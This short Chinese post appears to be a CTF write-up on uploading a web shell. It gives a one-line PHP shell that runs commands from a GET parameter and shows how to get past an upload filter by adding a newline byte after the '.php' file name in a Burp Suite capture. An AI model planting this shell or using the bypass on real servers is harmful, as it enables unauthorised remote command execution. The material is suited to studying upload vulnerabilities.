Web页面:
新建一个一句话木马:
0.php
<?php system($_GET[0]); ?>上传木马, burpsuite 抓包。
直接上传是回显 bad file。
我们查看数据包的二进制内容(hex),内容是以16进制显示的,找到文件名那一栏,在 .php 的后面添加换行符,在ASCII编码表中,回车符的16进制表示是0x0D,而换行符的16进制表示是0x0A,所以在这里填 0a。
send 后,我们访问一下。发现木马上传成功。
相关推荐
Tipray200621 分钟前
让敏感数据在流转与存储中始终守护在安全范围是小满满满满吗1 小时前
传输层:udp与tcp协议前端页面仔1 小时前
易语言是什么?易语言能做什么?小刘同学++1 小时前
ECB(电子密码本,Electronic Codebook) 和 CBC(密码分组链接,Cipher Block Chaining)区分于用途gadiaola2 小时前
【计算机网络】第3章:传输层—TCP 拥塞控制猎板PCB厚铜专家大族2 小时前
多层PCB技术解析:从材料选型到制造工艺的深度实践FakeOccupational4 小时前
【碎碎念】宝可梦 Mesh GO : 基于MESH网络的口袋妖怪 宝可梦GO游戏自组网系统fei_sun6 小时前
【计算机网络】三报文握手建立TCP连接Johny_Zhao6 小时前
2025年6月Docker镜像加速失效终极解决方案PypYCCcccCc6 小时前
支付系统架构图